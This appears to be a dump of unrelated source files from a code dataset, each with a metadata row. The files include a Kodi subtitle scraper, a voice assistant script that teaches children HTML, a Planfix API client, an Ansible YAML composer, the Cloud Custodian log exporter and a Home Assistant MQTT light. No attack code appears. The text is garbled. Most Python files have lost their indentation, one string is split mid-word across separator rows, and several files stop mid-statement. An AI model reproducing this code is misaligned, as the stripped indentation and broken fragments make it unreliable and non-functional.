req_hi = kodi.get_setting('subtitle-hi') == 'true'
req_hd = kodi.get_setting('subtitle-hd') == 'true'
items = []
regex = re.compile('<td>(\d+)</td><td>(\d+)</td><td>.*?</td><td>(.*?)</td><td.*?>(.*?)</td>.*?<td.*?>(.+?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?>(.*?)</td><td.*?><a\s+href="(.*?)">.+?</td>',
re.DOTALL)
for match in regex.finditer(html):
season, episode, srt_lang, version, completed, hi, corrected, hd, srt_url = match.groups()
if not language or language == srt_lang and (not req_hi or hi) and (not req_hd or hd):
item = {}
item['season'] = season
item['episode'] = episode
item['language'] = srt_lang
item['version'] = version
if completed.lower() == 'completed':
item['completed'] = True
item['percent'] = '100'
else:
item['completed'] = False
r = re.search('([\d.]+)%', completed)
if r:
item['percent'] = r.group(1)
else:
item['percent'] = '0'
item['hi'] = True if hi else False
item['corrected'] = True if corrected else False
item['hd'] = True if hd else False
item['url'] = srt_url
items.append(item)
return items
def get_episode_subtitles(self, language, tvshow_id, season, episode):
subtitles = self.get_season_subtitles(language, tvshow_id, season)
items = []
for subtitle in subtitles:
if subtitle['episode'] == str(episode):
items.append(subtitle)
return items
def download_subtitle(self, url):
url = BASE_URL + url
(response, srt) = self.__get_url(url)
if not hasattr(response, 'info') or 'Content-Disposition' not in response.info():
return
cd = response.info()['Content-Disposition']
r = re.search('filename="(.*)"', cd)
if r:
filename = r.group(1)
else:
filename = 'addic7ed_subtitle.srt'
filename = re.sub('[^\x00-\x7F]', '', filename)
final_path = os.path.join(kodi.get_setting('subtitle-folder'), filename)
final_path = kodi.translate_path(final_path)
if not xbmcvfs.exists(os.path.dirname(final_path)):
try:
try: xbmcvfs.mkdirs(os.path.dirname(final_path))
except: os.mkdir(os.path.dirname(final_path))
except:
log_utils.log('Failed to create directory %s' % os.path.dirname(final_path), log_utils.LOGERROR)
raise
with open(final_path, 'w') as f:
f.write(srt)
return final_path
def __get_url(self, url):
try:
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
req.add_header('Host', host)
req.add_header('Referer', BASE_URL)
response = urllib2.urlopen(req, timeout=10)
body = response.read()
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ('', '')
return (response, body)
def __get_cached_url(self, url, cache=8):
log_utils.log('Fetching Cached URL: %s' % url, log_utils.LOGDEBUG)
before = time.time()
_created, _res_header, html = self.db_connection.get_cached_url(url, cache_limit=cache)
if html:
log_utils.log('Returning cached result for: %s' % (url), log_utils.LOGDEBUG)
return html
log_utils.log('No cached url found for: %s' % url, log_utils.LOGDEBUG)
req = urllib2.Request(url)
host = BASE_URL.replace('http://', '')
req.add_header('User-Agent', USER_AGENT)
req.add_header('Host', host)
        req.add_header('Referer', BASE_URL)
try:
body = self.__http_get_with_retry(url, req)
body = body.decode('utf-8')
parser = HTMLParser.HTMLParser()
body = parser.unescape(body)
except Exception as e:
kodi.notify(msg='Failed to connect to URL: %s' % (url), duration=5000)
log_utils.log('Failed to connect to URL %s: (%s)' % (url, e), log_utils.LOGERROR)
return ''
self.db_connection.cache_url(url, body)
after = time.time()
        log_utils.log('Url Fetch took: %.2f secs' % (after - before), log_utils.LOGDEBUG)  # message text assumed
        return body
|
ultimatepritam/HelloWeb
|
DoraTheExplorer.py
|
Python
|
gpl-3.0
| 7,919
| 0.011491
|
#This script is built as a prototype during Mozilla HelloWeb Hackathon Kolkata 2016
#An Interactive Artificial Intelligence with a friendly personality to teach 5 year olds about HTML and WEB
#Copyright Protected Under GPL3 License | Follow the License | Send Pull Requests
import re
import py
import requests
import pyaudio
import speech_recognition as sr
import os
import random
import socket
import webbrowser # facebook.com/ultimatepritam | github.com/ultimatepritam
import subprocess
import glob # GRAPHICAL USER INTERfACE using 'Tkinter' immitating "DORA THE ExPLORER"
import time
##CONFIGURE THIS SECTION TO INDIAN LANGUAGES
# set property to voice engine
import pyttsx
engine = pyttsx.init('sapi5') #USE espeak IN LINUX
engine.setProperty('voice', 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Speech\Voices\Tokens\TTS_MS_EN-US_ZIRA_11.0')
engine.setProperty('rate', 130)
# speak function
def speak(text):
engine.say(text)
engine.runAndWait()
doss = os.getcwd()
i=0
n=0
flag=0
FACE = '''
+=======================================+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+---------------------------------------+
|#Author: ALienTrix |
|#Date: 01/06/2016 |
___
( )
.-.| | .--. ___ .-. .---.
/ \ | / \ ( ) \ / .-, \
| .-. | | .-. ; | ' .-. ; (__) ; |
| | | | | | | | | / (___) .'` |
| | | | | | | | | | / .'| |
| | | | | | | | | | | / | |
| ' | | | ' | | | | ; | ; |
' `-' / ' `-' / | | ' `-' |
`.__,' `.__.' (___) `.__.'_.
| |
+---------------------------------------+
|.....JARVIS ARTIFICIAL INTELLIGENCE...|
+=======================================+
| |
+=======================================+
'''
print(FACE)
while (i<1):
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.adjust_for_ambient_noise(source)
speak("Listening..")
print("|-('')-|") #START TALKING ONLY AFTER THIS PRINTS ON THE SCREEN
audio = r.listen(source)
try:
s = (r.recognize_google(audio)) #I used google gTTS as its the best Online recognizer, you can use CMU-SPHINX for OFFLINE
message = (s.lower())
print (message)
# PROFESSOR JARVIS ========================================================================================================== TRAINING MODULE
if("teach me web") in message:
rand = ['Oh My Goodness! You are only 5 years old! and you wanna know HTML?']
speak(rand)
speak("Okay, So HTML Stands for Hyper Text Markup Language! But lets not worry about this big word")
speak("Now I'll do something for you, but lets first you cute little thing tell me whats your name ?")
r = sr.Recognizer()
with sr.Microphone() as source:
audio = r.adjust_for_ambient_noise(source)
#speak("Listening..")
print(">>>")
audio = r.listen(source)
s = (r.recognize_google(audio))
message = (s.lower())
name=message
print (name)
speak('Oukay'+message+', So pretty name you have!')
speak("Now Lets check this Cool thing I'm opening here...")
Chrome = ("C:/Program Files (x86)/Google/Chrome/Application/chrome.exe %s")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
# B102 HARDWARE INTERRUPT NEEDED, CLOSE CHROME MANUALLY
#time.sleep(10)
#os.system('taskkill /im chrome.exe /f')
speak("Do you see your name there? What? No?")
print("10 sec up")
os.system('atom KeepCalm.html')
#subprocess.call(['notepad.exe','KeepCalm.html'])
# To be done: Selenium Time Controlled Web Browser Monitor
speak("Okay I am Opening something where you'll see some bla bla texts..")
speak("You see it?")
time.sleep(10)
print("10 sec up")
#HEADER
speak("Look theres written Dora the explorer there, lets change it your name. You know you have a good cool name. Lets write it down here.")
#os.system("notepad.exe keepcalm.html")
#os.system('atom KeepCalm.html')
time.sleep(10)
print("10 sec up")
speak("Now lets check the page with the Ugly naked guy again!")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("can you see your name there now?")
speak("You see it? Great!!")
speak("You know its called a Header in html, grown ups write some
|
big texts her
|
e!")
#IMAGE IMPORT IN HTML
speak("Oho! Everything is great but you don't have to be naked for that. Lets dress up, shall we?")
speak("Now lets again check that stupid file with lots of bla bla texts in it")
os.system('atom KeepCalm.html')
speak("Do you see NAKED Guy written on somewhere? Can you see it? You found it? Yaaai!!")
speak("Now lets change it to DRESSED Guy")
speak("Now lets check the browser again")
webbrowser.get(Chrome).open('KeepCalm.html') #You might need to put the full path of the file here
speak("Yep! this looks better! You are a Smart kid!")
speak("Now what you just did is how we change pictures in HTML")
#STYLING IN HTML
speak("Well since we are actually doing many cool stuffs! so that 'Keep calm and Do Nothing' phrase is little awkward. don't you think so?")
speak("Now lets change it like you changed your name, Come on you can do it, I'm opening the same thing for you, its called an Editor, here you can write html codes")
os.system('atom KeepCalm.html')
speak("Now lets change the text to Keep calm and do Coding")
time.sleep(10)
print("10 sec up")
speak("you did it, cool")
speak("This portion of the code is called the Body you know! Body of the code!")
speak("Now lets make the fonts look little bit bigger")
speak("can you see there written font size?")
speak("Change the value next to the font size 160 to 200 now")
webbrowser.get(Chrome).open('KeepCalm.html')
speak("You done it? Good Work!")
speak("This thing just you did is called Styling. You know every cool kid likes fashion, our html too is cool. he likes styles. and it is called CSS")
#FURTHER DEVELOPMENT GOES BELOW HERE INSIDE THE LOOP
# exceptions
except sr.UnknownValueError:
print("$could not understand audio")
speak("Pardon sir, can you please repeat?")
except sr.RequestError as e:
print("Could not request results$; {0}".format(e))
|
odoo-brazil/l10n-brazil-wip
|
l10n_br_financial/constantes.py
|
Python
|
agpl-3.0
| 388
| 0
|
# -*- coding: utf-8 -*-
# Copyright 2017 KMEE
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl).
from __future__ import division, print_function, unicode_literals
TIPO_COBRANCA = (
('0', u'Carteira'),
('1', u'Cheque'),
('2', u'CNAB'),
)
TIPO_COBRANCA_SPED = (
('0', u'Duplicata'),
('1', u'Cheque'),
('2', u'Promissória'),
    ('3', u'Recibo'),
)
|
gitterHQ/ansible
|
v2/ansible/parsing/yaml/composer.py
|
Python
|
gpl-3.0
| 1,212
| 0.00495
|
from yaml.composer import Composer
from yaml.nodes import MappingNode
class AnsibleComposer(Composer):
def __init__(self):
self.__mapping_starts = []
super(Composer, self).__init__()
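    # __mapping_starts queues (line, column) pairs pushed by
    # compose_mapping_node so compose_node can stamp each MappingNode with its
    # source position for error reporting.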
def compose_node(self, parent, index):
# the line number where the previous token has ended (plus empty lines)
node = Composer.compose_node(self, parent, index)
if isinstance(node, MappingNode):
node.__datasource__ = self.name
try:
(cur_line, cur_column) = self.__mapping_starts.pop()
except:
cur_line = None
cur_column = None
node.__line__ = cur_line
node.__column__ = cur_column
        return node
def compose_mapping_node(self, anchor):
# the column here will point at the position in the file immediately
# after the first key is found, which could be a space or a newline.
# We could back this up to find the beginning of the key, but this
# should be good enough to determine the error location.
        self.__mapping_starts.append((self.line + 1, self.column + 1))
return Composer.compose_mapping_node(self, anchor)
|
westernx/sgfs
|
sgfs/commands/rv.py
|
Python
|
bsd-3-clause
| 2,458
| 0.004475
|
import os
from subprocess import call, Popen, PIPE
import sys
from . import Command
from . import utils
class OpenSequenceInRV(Command):
"""%prog [options] [paths]
Open the latest version for each given entity.
"""
def run(self, sgfs, opts, args):
# Parse them all.
arg_to_movie = {}
arg_to_entity = {}
for arg in args:
if os.path.exists(arg):
arg_to_movie[arg] = arg
continue
print 'Parsing %r...' % arg
data = utils.parse_spec(sgfs, arg.split(), ['Shot'])
type_ = data.get('type')
id_ = data.get('id')
if not (type_ or id_):
print 'no entities found for', repr(arg)
return 1
arg_to_entity.setdefault(type_, {})[arg] = sgfs.session.merge(dict(type=type_, id=id_))
tasks = arg_to_entity.pop('Task', {})
shots = arg_to_entity.pop('Shot', {})
if arg_to_entity:
print 'found entities that were not Task or Shot:', ', '.join(sorted(arg_to_entity))
return 2
if tasks:
print 'Getting shots from tasks...'
sgfs.session.fetch(tasks.values(), 'entity')
for arg, task in tasks.iteritems():
shots[arg] = task['entity']
if shots:
print 'Getting versions from shots...'
sgfs.session.fetch(shots.values(), ('sg_latest_version.Version.sg_path_to_movie', 'sg_latest_version.Version.sg_path_to_frames'))
for arg, shot in shots.iteritems():
version = shot.get('sg_latest_version')
if not version:
print 'no version for', shot
return 3
path = version.get('sg_path_to_movie') or version.get('sg_path_to_frames')
if not path:
print 'no movie or frames for', version
return 4
                arg_to_movie[arg] = path
movies = [arg_to_movie[arg] for arg in args]
print 'Opening:'
print '\t' + '\n\t'.join(movies)
rvlink = Popen(['rv', '-bakeURL'] + movies, stderr=PIPE).communicate()[1].strip().split()[-1]
self.open(rvlink)
def open(self, x):
if sys.platform.startswith('darwin'):
call(['open', x])
else:
call(['xdg-open', x])
run = OpenSequenceInRV()
|
chadoneba/django-planfix
|
planfix/classes.py
|
Python
|
apache-2.0
| 6,136
| 0.009452
|
import requests
from hashlib import md5
from xml.etree import ElementTree
from django.core.cache import cache
from functools import cmp_to_key
# class Cache(object):
# params = {}
#
# def get(self,key):
# if key in self.params:
# return self.params[key]
# else:
# return None
#
# def set(self,key,value,timeout):
# self.params[key] = value
#
#
# cache = Cache()
class PlanFixBase(object):
CACHE_TIMELIFE = 20
request_templ = """<?xml version="1.0" encoding="UTF-8"?>
<request method="{}">
{}
<signature>{}</signature>
</request>
"""
name = ''
scheme = []
sign = ''
host = ""
api_key = ""
private_key = ""
project_id = ""
user = ""
password = ""
account = ""
level = 0
sid = None
debug = None
def __init__(self,*args,**kwargs):
self.sid = cache.get('planfix_sid')
attr_list = [i.__str__() for i in dir(self) if not i.startswith('__')]
if kwargs:
for item in kwargs.keys():
if item in attr_list:
self.__setattr__(item,kwargs[item])
if not self.sid:
self.auth()
def scheme_sort(self,a,b):
tmp_a = a.keys()[0] if isinstance(a,dict) else a
tmp_b = b.keys()[0] if isinstance(b,dict) else b
if tmp_a == tmp_b: return 0
if tmp_a > tmp_b:
return 1
else:
return -1
def get_sign(self,**kwargs):
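        # API request signature: md5 over the method name, the field values
        # concatenated in scheme order, and the private key.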
params_list = self.name + self.string_by_schemefileds(self.scheme,**kwargs) + self.private_key
self.sign = md5(params_list.encode('utf-8')).hexdigest()
def string_by_schemefileds(self,element,**kwargs):
result_list = []
element = list(element)
        element.sort(key=cmp_to_key(self.scheme_sort))
for item in element:
if not isinstance(item, dict):
tmp_item = self.get_value(item,)
result_list.append(self.get_value(item, **kwargs))
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
                        result_list.append(self.get_value(tmp_key, **kwargs))
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res, list):
result_list.append("".join(["".join([str(i[0]),str(i[1])]) for i in res]))
else:
result_list.append(self.get_value(tmp_val, **kwargs))
else:
result_list.append(self.string_by_schemefileds(tmp_val, **kwargs))
return "".join(result_list)
def get_value(self,value, **kwargs):
if value in kwargs:
return kwargs.get(value)
return ''
def create_xml_by_scheme(self,element, **kwargs):
result = ""
template = "<%s>%s</%s>"
custom_data_template = "<id>%s</id><value>%s</value>"
for item in element:
if not isinstance(item, dict):
result += template % (item, self.get_value(item, **kwargs), item)
else:
tmp_key, tmp_val = item.items()[0]
if not isinstance(tmp_val, list):
if tmp_val == 'id':
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
elif tmp_val == 'customValue':
res = self.get_value(tmp_key, **kwargs)
if not res == '' and isinstance(res,list):
sub_result = "".join([template % (tmp_val,(custom_data_template % i),tmp_val) for i in res])
else:
sub_result = template % (tmp_val, self.get_value(tmp_key, **kwargs), tmp_val)
else:
sub_result = self.create_xml_by_scheme(tmp_val, **kwargs)
result += template % (tmp_key, sub_result, tmp_key)
return result
def connect(self,**kwargs):
if not 'sid' in kwargs and self.sid:
kwargs['sid'] = self.sid
self.get_sign(**kwargs)
body = self.create_xml_by_scheme(self.scheme, **kwargs)
self.print_debug(body)
data = self.request_templ.format(self.name,body.encode('utf-8'),self.sign)
r = requests.post(self.host, data=data, auth=(self.api_key, ""))
if self.name != 'auth.login':
if self.is_session_valid(r.content):
self.print_debug(r.content)
return r.content
else:
tmp_params = dict(name=self.name,scheme=self.scheme)
self.auth(renew=True)
self.scheme,self.name = tmp_params['scheme'],tmp_params['name']
return self.connect(**kwargs)
else:
return r.content
def is_session_valid(self,res):
response = ElementTree.fromstring(res)
if response.attrib['status'] == 'ok':
return True
else:
if response.find('code').text == '0005':
return False
else:
raise AttributeError(response.find('code').text)
def auth(self,renew=False):
if renew or self.sid == None:
self.name = 'auth.login'
self.scheme = \
[ 'account'
, 'login'
, 'password'
]
params = \
{ 'account':self.account
, 'login':self.user
, 'password':self.password
}
response = ElementTree.fromstring(self.connect(**params))
res = response.find('sid')
self.sid = res.text
cache.set('planfix_sid',self.sid,self.CACHE_TIMELIFE*60)
def print_debug(self,msg):
if hasattr(self.debug,'__call__'):
try:
self.debug(msg)
except TypeError as e:
print(e)
|
oknalv/piollo
|
loggersingleton.py
|
Python
|
gpl-2.0
| 1,004
| 0.001992
|
class LoggerSingleton:
_instance = None
@staticmethod
def get_instance(console_log=False):
if LoggerSingleton._instance is None:
LoggerSingleton._instance = LoggerSingleton._Logger()
if console_log:
LoggerSingleton._instance.set_next(LoggerSingleton._ConsoleLogger())
return LoggerSingleton._instance
class _Logger(object):
def __init__(self):
self.next_logger = None
def log(self, message):
if self.next_logger is not None:
self.next_logger.log(message)
def set_next(self, next):
if self.next_logger is not None:
self.next_logger.set_next(next)
else:
self.next_logger = next
class _ConsoleLogger(_Logger):
def __init__(self):
            LoggerSingleton._Logger.__init__(self)
def log(self, message):
print message
            LoggerSingleton._Logger.log(self, message)
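
# Minimal usage sketch: fetch the shared logger, optionally chaining a console
# logger, and send a message down the chain.
#
#   logger = LoggerSingleton.get_instance(console_log=True)
#   logger.log("hello")  # _Logger forwards to _ConsoleLogger, which prints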
|
ogazitt/stackalytics
|
tests/unit/test_mps.py
|
Python
|
apache-2.0
| 1,964
| 0
|
# Copyright (c) 2013 Mirantis Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re
import testtools
from stackalytics.processor import mps
class TestMps(testtools.TestCase):
def setUp(self):
super(TestMps, self).setUp()
def test_member_parse_regex(self):
content = '''<h1>Individual Member Profile</h1>
<div class="candidate span-14">
<div class="span-4">
<img src="/themes/openstack/images/generic-profile-photo.png"><p> </p>
</div>
<a name="profile-10501"></a>
<div class="details span-10 last">
<div class="last name-and-title">
<h3>Jim Battenberg</h3>
</div>
<hr><div class="span-3"><strong>Date Joined</strong></div>
<div class="span-7 last">June 25, 2013 <br><br></div>
<div class="span-3"><strong>Affiliatio
|
ns</strong></div>
<div class="span-7 last">
<div>
<b>Rackspace</b> From (Current)
</div>
</div>
<div class="span-3"><strong>Statement of Interest </strong></div>
<div class="span-7 last">
<p>contribute logic and evangelize openstack</p>
</div>
<p> </p>'''
match = re.search(mps.NAME_AND_DATE_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Jim Battenberg', match.group('member_name'))
self.assertEqual('June 25, 2013 ', match.group('date_joined'))
match = re.search(mps.COMPANY_PATTERN, content)
self.assertTrue(match)
self.assertEqual('Rackspace', match.group('company_draft'))
|
sixfeetup/cloud-custodian
|
tools/c7n_logexporter/c7n_logexporter/exporter.py
|
Python
|
apache-2.0
| 26,318
| 0.00057
|
# Copyright 2017 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from botocore.exceptions import ClientError
import boto3
import click
import json
from c7n.credentials import assumed_session
from c7n.utils import get_retry, dumps, chunks
from concurrent.futures import ThreadPoolExecutor, as_completed
from datetime import datetime, timedelta
from dateutil.tz import tzutc, tzlocal
from dateutil.parser import parse
import fnmatch
import functools
import jsonschema
import logging
import time
import os
import operator
from tabulate import tabulate
import yaml
from c7n.executor import MainThreadExecutor
MainThreadExecutor.async = False
logging.basicConfig(level=logging.INFO)
logging.getLogger('c7n.worker').setLevel(logging.DEBUG)
logging.getLogger('botocore').setLevel(logging.WARNING)
log = logging.getLogger('c7n-log-exporter')
CONFIG_SCHEMA = {
'$schema': 'http://json-schema.org/schema#',
'id': 'http://schema.cloudcustodian.io/v0/logexporter.json',
'definitions': {
'destination': {
'type': 'object',
'additionalProperties': False,
'required': ['bucket'],
'properties': {
'bucket': {'type': 'string'},
'prefix': {'type': 'string'},
},
},
'account': {
'type': 'object',
'additionalProperties': False,
'required': ['role', 'groups'],
'properties': {
'name': {'type': 'string'},
'role': {'oneOf': [
{'type': 'array', 'items': {'type': 'string'}},
{'type': 'string'}]},
'groups': {
'type': 'array', 'items': {'type': 'string'}
}
}
}
},
'type': 'object',
'additionalProperties': False,
'required': ['accounts', 'destination'],
'properties': {
'accounts': {
'type': 'array',
'items': {'$ref': '#/definitions/account'}
},
'destination': {'$ref': '#/definitions/destination'}
}
}
def debug(func):
@functools.wraps(func)
def run(*args, **kw):
try:
return func(*args, **kw)
except SystemExit:
raise
except Exception:
import traceback
import pdb
import sys
traceback.print_exc()
pdb.post_mortem(sys.exc_info()[-1])
raise
return run
@click.group()
def cli():
"""c7n cloudwatch log group exporter"""
@cli.command()
@click.option('--config', type=click.Path())
def validate(config):
"""validate config file"""
with open(config) as fh:
content = fh.read()
try:
data = yaml.safe_load(content)
except Exception:
log.error("config file: %s is not valid yaml", config)
raise
try:
jsonschema.validate(data, CONFIG_SCHEMA)
except Exception:
log.error("config file: %s is not valid", config)
raise
log.info("config file valid, accounts:%d", len(data['accounts']))
return data
@cli.command()
@click.option('--config', type=click.Path(), required=True)
@click.option('--start', required=True)
@click.option('--end')
@click.option('-a', '--accounts', multiple=True)
@click.option('--debug', is_flag=True, default=False)
def run(config, start, end, accounts, debug):
"""run export across accounts and log groups specified in config."""
config = validate.callback(config)
destination = config.get('destination')
start = start and parse(start) or start
end = end and parse(end) or datetime.now()
executor = debug and MainThreadExecutor or ThreadPoolExecutor
with executor(max_workers=32) as w:
futures = {}
for account in config.get('accounts', ()):
if accounts and account['name'] not in accounts:
continue
futures[
w.submit(process_account, account, start, end, destination)] = account
for f in as_completed(futures):
account = futures[f]
if f.exception():
log.error("Error on account %s err: %s",
account['name'], f.exception())
log.info("Completed %s", account['name'])
def lambdafan(func):
"""simple decorator that will auto fan out async style in lambda.
outside of lambda, this will invoke synchrously.
"""
if 'AWS_LAMBDA_FUNCTION_NAME' not in os.environ:
return func
@functools.wraps(func)
def scaleout(*args, **kw):
client = boto3.client('lambda')
client.invoke(
FunctionName=os.environ['AWS_LAMBDA_FUNCTION_NAME'],
InvocationType='Event',
Payload=dumps({
'event': 'fanout',
'function': func.__name__,
'args': args,
'kwargs': kw}),
Qualifier=os.environ['AWS_LAMBDA_FUNCTION_VERSION'])
return scaleout
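# Resulting call path: outside Lambda, lambdafan is a no-op and the decorated
# function runs inline; inside Lambda, each call re-invokes the current
# function asynchronously with its serialized arguments.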
@lambdafan
def process_account(account, start, end, destination, incremental=True):
session = get_session(account['role'])
client = session.client('logs')
paginator = client.get_paginator('describe_log_groups')
all_groups = []
for p in paginator.paginate():
all_groups.extend([g for g in p.get('logGroups', ())])
group_count = len(all_groups)
groups = filter_creation_date(
filter_group_names(all_groups, account['groups']),
start, end)
if incremental:
groups = filter_last_write(client, groups, start)
account_id = session.client('sts').get_caller_identity()['Account']
prefix = destination.get('prefix', '').rstrip('/') + '/%s' % account_id
log.info("account:%s matched %d groups of %d",
account.get('name', account_id), len(groups), group_count)
if not groups:
log.warning("account:%s no groups matched, all groups \n %s",
account.get('name', account_id), "\n ".join(
[g['logGroupName'] for g in all_groups]))
t = time.time()
for g in groups:
export.callback(
g,
destination['bucket'], prefix,
g['exportStart'], end, account['role'],
name=account['name'])
log.info("account:%s exported %d log groups in time:%0.2f",
account.get('name') or account_id,
len(groups), time.time() - t)
def get_session(role, session_name="c7n-log-exporter", session=None):
if role == 'self':
session = boto3.Session()
elif isinstance(role, basestring):
session = assumed_session(role, session_name)
elif isinstance(role, list):
session = None
for r in role:
session = assumed_session(r, session_name, session=session)
else:
session = boto3.Session()
return session
def filter_group_names(groups, patterns):
"""Filter log groups by shell patterns.
"""
group_names = [g['logGroupName'] for g in groups]
matched = set()
for p in patterns:
matched.update(fnmatch.filter(group_names, p))
return [g for g in groups if g['logGroupName'] in matched]
def filter_creation_date(groups, start, end):
"""Filter log groups by their creation date.
Also sets group specific value for start to the minimum
of creation date or start.
"""
results = []
for g in groups:
created = datetime.fromtimestamp(g['creationTime'] / 1000.0)
if created > end:
continue
if created > start:
g['exportStart'] = created
else:
g['exportStart'] = start
results.append(g)
    return results
|
tinloaf/home-assistant
|
homeassistant/components/light/mqtt/schema_template.py
|
Python
|
apache-2.0
| 16,276
| 0
|
"""
Support for MQTT Template lights.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/light.mqtt_template/
"""
import logging
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components import mqtt
from homeassistant.components.light import (
ATTR_BRIGHTNESS, ATTR_COLOR_TEMP, ATTR_EFFECT, ATTR_FLASH,
ATTR_HS_COLOR, ATTR_TRANSITION, ATTR_WHITE_VALUE, Light,
SUPPORT_BRIGHTNESS, SUPPORT_COLOR_TEMP, SUPPORT_EFFECT, SUPPORT_FLASH,
SUPPORT_COLOR, SUPPORT_TRANSITION, SUPPORT_WHITE_VALUE)
from homeassistant.const import (
CONF_DEVICE, CONF_NAME, CONF_OPTIMISTIC, STATE_ON, STATE_OFF)
from homeassistant.components.mqtt import (
CONF_AVAILABILITY_TOPIC, CONF_STATE_TOPIC, CONF_COMMAND_TOPIC,
CONF_PAYLOAD_AVAILABLE, CONF_PAYLOAD_NOT_AVAILABLE, CONF_QOS, CONF_RETAIN,
MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo, subscription)
import homeassistant.helpers.config_validation as cv
import homeassistant.util.color as color_util
from homeassistant.helpers.restore_state import RestoreEntity
_LOGGER = logging.getLogger(__name__)
DOMAIN = 'mqtt_template'
DEPENDENCIES = ['mqtt']
DEFAULT_NAME = 'MQTT Template Light'
DEFAULT_OPTIMISTIC = False
CONF_BLUE_TEMPLATE = 'blue_template'
CONF_BRIGHTNESS_TEMPLATE = 'brightness_template'
CONF_COLOR_TEMP_TEMPLATE = 'color_temp_template'
CONF_COMMAND_OFF_TEMPLATE = 'command_off_template'
CONF_COMMAND_ON_TEMPLATE = 'command_on_template'
CONF_EFFECT_LIST = 'effect_list'
CONF_EFFECT_TEMPLATE = 'effect_template'
CONF_GREEN_TEMPLATE = 'green_template'
CONF_RED_TEMPLATE = 'red_template'
CONF_STATE_TEMPLATE = 'state_template'
CONF_WHITE_VALUE_TEMPLATE = 'white_value_template'
CONF_UNIQUE_ID = 'unique_id'
PLATFORM_SCHEMA_TEMPLATE = mqtt.MQTT_RW_PLATFORM_SCHEMA.extend({
vol.Optional(CONF_BLUE_TEMPLATE): cv.template,
vol.Optional(CONF_BRIGHTNESS_TEMPLATE): cv.template,
vol.Optional(CONF_COLOR_TEMP_TEMPLATE): cv.template,
vol.Optional(CONF_EFFECT_LIST): vol.All(cv.ensure_list, [cv.string]),
vol.Optional(CONF_EFFECT_TEMPLATE): cv.template,
vol.Optional(CONF_GREEN_TEMPLATE): cv.template,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_OPTIMISTIC, default=DEFAULT_OPTIMISTIC): cv.boolean,
vol.Optional(CONF_RED_TEMPLATE): cv.template,
vol.Optional(CONF_RETAIN, default=mqtt.DEFAULT_RETAIN): cv.boolean,
vol.Optional(CONF_STATE_TEMPLATE): cv.template,
vol.Optional(CONF_STATE_TOPIC): mqtt.valid_subscribe_topic,
vol.Optional(CONF_WHITE_VALUE_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_OFF_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_ON_TEMPLATE): cv.template,
vol.Required(CONF_COMMAND_TOPIC): mqtt.valid_publish_topic,
vol.Optional(CONF_QOS, default=mqtt.DEFAULT_QOS):
vol.All(vol.Coerce(int), vol.In([0, 1, 2])),
vol.Optional(CONF_UNIQUE_ID): cv.string,
vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
}).extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
async def async_setup_entity_template(hass, config, async_add_entities,
discovery_hash):
"""Set up a MQTT Template light."""
async_add_entities([MqttTemplate(config, discovery_hash)])
# pylint: disable=too-many-ancestors
class MqttTemplate(MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo,
Light, RestoreEntity):
"""Representation of a MQTT Template light."""
def __init__(self, config, discovery_hash):
"""Initialize a MQTT Template light."""
self._state = False
self._sub_state = None
self._topics = None
self._templates = None
self._optimistic = False
# features
self._brightness = None
self._color_temp = None
self._white_value = None
self._hs = None
self._effect = None
self._unique_id = config.get(CONF_UNIQUE_ID)
# Load config
self._setup_from_config(config)
availability_topic = config.get(CONF_AVAILABILITY_TOPIC)
payload_available = config.get(CONF_PAYLOAD_AVAILABLE)
payload_not_available = config.get(CONF_PAYLOAD_NOT_AVAILABLE)
qos = config.get(CONF_QOS)
device_config = config.get(CONF_DEVICE)
MqttAvailability.__init__(self, availability_topic, qos,
payload_available, payload_not_available)
MqttDiscoveryUpdate.__init__(self, discovery_hash,
self.discovery_update)
MqttEntityDeviceInfo.__init__(self, device_config)
async def async_added_to_hass(self):
"""Subscribe to MQTT events."""
await super().async_added_to_hass()
await self._subscribe_topics()
async def discovery_update(self, discovery_payload):
"""Handle updated discovery message."""
config = PLATFORM_SCHEMA_TEMPLATE(discovery_payload)
self._setup_from_config(config)
await self.availability_discovery_update(config)
await self._subscribe_topics()
self.async_schedule_update_ha_state()
def _setup_from_config(self, config):
"""(Re)Setup the entity."""
self._config = config
self._topics = {
key: config.get(key) for key in (
CONF_STATE_TOPIC,
CONF_COMMAND_TOPIC
)
}
self._templates = {
